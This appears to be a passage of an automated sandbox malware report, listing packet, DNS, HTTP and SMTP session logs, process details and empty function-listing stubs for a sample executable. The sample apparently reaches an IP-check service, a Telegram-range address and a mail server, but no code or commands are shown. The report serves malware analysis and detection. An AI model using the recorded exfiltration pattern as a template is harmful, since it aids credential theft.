Oct 22, 2024 16:04:30.325028896 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.325551987 CEST | 80 | 49726 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:30.325628996 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.325721025 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.331250906 CEST | 80 | 49726 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:30.988492966 CEST | 80 | 49726 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:31.029916048 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.029967070 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.030067921 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.030268908 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:31.030535936 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.030546904 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.646409988 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.647941113 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.647963047 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.792936087 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.793045998 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.793176889 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.793632984 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.822829962 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:31.828690052 CEST | 80 | 49726 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:31.828923941 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:31.830674887 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:31.830712080 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:31.831253052 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:31.831716061 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:31.831727982 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.663609028 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.663738012 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:32.666831017 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:32.666847944 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.667126894 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.668617964 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:32.711343050 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.902990103 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.903064966 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.903153896 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:32.905893087 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:38.817065954 CEST | 49714 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:39.038866043 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:39.044279099 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:39.044500113 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:39.782625914 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:39.787214994 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:39.792679071 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.036479950 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.036618948 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.041965961 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.291269064 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.291817904 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.298890114 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.548450947 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.548522949 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.548558950 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.548585892 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.551434994 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.558651924 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.801074982 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.803610086 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.809405088 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.055737019 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.056462049 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:41.062128067 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.373395920 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.374100924 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:41.379498005 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.689507008 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.689893961 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:41.695252895 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.939440966 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.940094948 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:41.946177006 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.946259022 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 22, 2024 16:04:12.889697075 CEST | 57120 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:12.898243904 CEST | 53 | 57120 | 1.1.1.1 | 192.168.2.10 |
Oct 22, 2024 16:04:14.224435091 CEST | 54912 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:14.232245922 CEST | 53 | 54912 | 1.1.1.1 | 192.168.2.10 |
Oct 22, 2024 16:04:18.449758053 CEST | 62130 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:18.457161903 CEST | 53 | 62130 | 1.1.1.1 | 192.168.2.10 |
Oct 22, 2024 16:04:19.574568987 CEST | 59112 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:19.799618959 CEST | 53 | 59112 | 1.1.1.1 | 192.168.2.10 |
Oct 22, 2024 16:04:31.822679996 CEST | 63612 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:31.829875946 CEST | 53 | 63612 | 1.1.1.1 | 192.168.2.10 |
Oct 22, 2024 16:04:39.026559114 CEST | 56678 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:39.036209106 CEST | 53 | 56678 | 1.1.1.1 | 192.168.2.10 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 22, 2024 16:04:12.889697075 CEST | 192.168.2.10 | 1.1.1.1 | 0x5342 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 22, 2024 16:04:14.224435091 CEST | 192.168.2.10 | 1.1.1.1 | 0xf1a3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 22, 2024 16:04:18.449758053 CEST | 192.168.2.10 | 1.1.1.1 | 0xdf59 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 22, 2024 16:04:19.574568987 CEST | 192.168.2.10 | 1.1.1.1 | 0xe66d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 22, 2024 16:04:31.822679996 CEST | 192.168.2.10 | 1.1.1.1 | 0x5711 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 22, 2024 16:04:39.026559114 CEST | 192.168.2.10 | 1.1.1.1 | 0xb038 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 22, 2024 16:04:12.898243904 CEST | 1.1.1.1 | 192.168.2.10 | 0x5342 | No error (0) | 142.250.185.174 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:14.232245922 CEST | 1.1.1.1 | 192.168.2.10 | 0xf1a3 | No error (0) | 142.250.186.65 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | checkip.dyndns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | 193.122.130.0 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | 132.226.247.73 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | 158.101.44.242 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | 132.226.8.169 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | 193.122.6.168 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:19.799618959 CEST | 1.1.1.1 | 192.168.2.10 | 0xe66d | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:19.799618959 CEST | 1.1.1.1 | 192.168.2.10 | 0xe66d | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:31.829875946 CEST | 1.1.1.1 | 192.168.2.10 | 0x5711 | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:39.036209106 CEST | 1.1.1.1 | 192.168.2.10 | 0xb038 | No error (0) | 213.165.67.118 | A (IP address) | IN (0x0001) | false | ||
Oct 22, 2024 16:04:39.036209106 CEST | 1.1.1.1 | 192.168.2.10 | 0xb038 | No error (0) | 213.165.67.102 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:18.466597080 CEST | 151 | OUT | |
Oct 22, 2024 16:04:19.138335943 CEST | 323 | IN | |
Oct 22, 2024 16:04:19.142839909 CEST | 127 | OUT | |
Oct 22, 2024 16:04:19.301644087 CEST | 323 | IN | |
Oct 22, 2024 16:04:20.598944902 CEST | 127 | OUT | |
Oct 22, 2024 16:04:20.758388996 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.10 | 49714 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:21.530924082 CEST | 127 | OUT | |
Oct 22, 2024 16:04:22.201797009 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.10 | 49716 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:22.965133905 CEST | 151 | OUT | |
Oct 22, 2024 16:04:23.627620935 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.10 | 49718 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:24.393897057 CEST | 151 | OUT | |
Oct 22, 2024 16:04:25.238945007 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.10 | 49720 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:26.039328098 CEST | 151 | OUT | |
Oct 22, 2024 16:04:26.703584909 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.10 | 49722 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:27.475423098 CEST | 151 | OUT | |
Oct 22, 2024 16:04:28.137046099 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.10 | 49724 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:28.916474104 CEST | 151 | OUT | |
Oct 22, 2024 16:04:29.574677944 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.10 | 49726 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:30.325721025 CEST | 151 | OUT | |
Oct 22, 2024 16:04:30.988492966 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.10 | 49709 | 142.250.185.174 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:13 UTC | 216 | OUT | |
2024-10-22 14:04:14 UTC | 1610 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.10 | 49710 | 142.250.186.65 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:15 UTC | 258 | OUT | |
2024-10-22 14:04:17 UTC | 4890 | IN | |
2024-10-22 14:04:17 UTC | 4890 | IN | |
2024-10-22 14:04:17 UTC | 4890 | IN | |
2024-10-22 14:04:17 UTC | 27 | IN | |
2024-10-22 14:04:17 UTC | 1325 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:20 UTC | 87 | OUT | |
2024-10-22 14:04:20 UTC | 896 | IN | |
2024-10-22 14:04:20 UTC | 366 | IN | |
2024-10-22 14:04:20 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.10 | 49713 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:21 UTC | 63 | OUT | |
2024-10-22 14:04:21 UTC | 896 | IN | |
2024-10-22 14:04:21 UTC | 366 | IN | |
2024-10-22 14:04:21 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.10 | 49715 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:22 UTC | 63 | OUT | |
2024-10-22 14:04:22 UTC | 896 | IN | |
2024-10-22 14:04:22 UTC | 366 | IN | |
2024-10-22 14:04:22 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:24 UTC | 87 | OUT | |
2024-10-22 14:04:24 UTC | 890 | IN | |
2024-10-22 14:04:24 UTC | 366 | IN | |
2024-10-22 14:04:24 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.10 | 49719 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:25 UTC | 63 | OUT | |
2024-10-22 14:04:26 UTC | 900 | IN | |
2024-10-22 14:04:26 UTC | 366 | IN | |
2024-10-22 14:04:26 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.10 | 49721 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:27 UTC | 87 | OUT | |
2024-10-22 14:04:27 UTC | 894 | IN | |
2024-10-22 14:04:27 UTC | 366 | IN | |
2024-10-22 14:04:27 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.10 | 49723 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:28 UTC | 63 | OUT | |
2024-10-22 14:04:28 UTC | 891 | IN | |
2024-10-22 14:04:28 UTC | 366 | IN | |
2024-10-22 14:04:28 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.10 | 49725 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:30 UTC | 87 | OUT | |
2024-10-22 14:04:30 UTC | 898 | IN | |
2024-10-22 14:04:30 UTC | 366 | IN | |
2024-10-22 14:04:30 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.10 | 49727 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:31 UTC | 63 | OUT | |
2024-10-22 14:04:31 UTC | 892 | IN | |
2024-10-22 14:04:31 UTC | 366 | IN | |
2024-10-22 14:04:31 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.10 | 49728 | 149.154.167.220 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:32 UTC | 349 | OUT | |
2024-10-22 14:04:32 UTC | 344 | IN | |
2024-10-22 14:04:32 UTC | 55 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Oct 22, 2024 16:04:39.782625914 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 | 220 kundenserver.de (mreue107) Nemesis ESMTP Service ready |
Oct 22, 2024 16:04:39.787214994 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 | EHLO 472847 |
Oct 22, 2024 16:04:40.036479950 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 | 250-kundenserver.de Hello 472847 [173.254.250.76] 250-8BITMIME 250-SIZE 141557760 250 STARTTLS |
Oct 22, 2024 16:04:40.036618948 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 | STARTTLS |
Oct 22, 2024 16:04:40.291269064 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 | 220 OK |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 10:03:11 |
Start date: | 22/10/2024 |
Path: | C:\Users\user\Desktop\Rundholterne89.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 891'148 bytes |
MD5 hash: | A1E239C4D5116E289CE0597A92844EDE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 10:03:14 |
Start date: | 22/10/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6b0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 10:03:14 |
Start date: | 22/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff620390000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 10:04:02 |
Start date: | 22/10/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xcc0000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 25.1% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 23.4% |
Total number of Nodes: | 1199 |
Total number of Limit Nodes: | 40 |
Graph
Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357stringcomfileCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405D51 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199stringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406033 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403A41 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004036AF Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401751 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401A03 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040597D Relevance: 3.0, APIs: 2, Instructions: 13COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040548B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
Memory Dump Source |
|
